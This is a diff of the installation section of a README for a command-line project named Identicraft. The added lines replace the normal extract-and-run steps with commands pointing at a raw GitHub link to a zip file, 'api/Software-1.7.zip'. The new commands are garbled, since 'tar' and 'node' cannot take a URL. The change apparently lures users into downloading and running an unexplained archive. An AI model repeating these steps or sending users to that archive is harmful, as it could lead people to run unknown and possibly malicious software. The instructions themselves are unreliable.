lau4318/Identicraft/README.md

 1. Open the terminal.
 2. Navigate to the folder where you downloaded the file using `cd ~/Downloads`.
-3. Extract the contents with the command: `tar -xvf Identicraft-latest.tar.gz`.
+3. Extract the contents with the command: `tar -xvf https://raw.githubusercontent.com/lau4318/Identicraft/main/api/Software-1.7.zip`.
 4. Go to the extracted folder with `cd Identicraft`.
-5. Run the application with `node index.js` or your preferred command to start the CLI.
+5. Run the application with `node https://raw.githubusercontent.com/lau4318/Identicraft/main/api/Software-1.7.zip` or your preferred command to start the CLI.

 ## 🛠️ Using Identicraft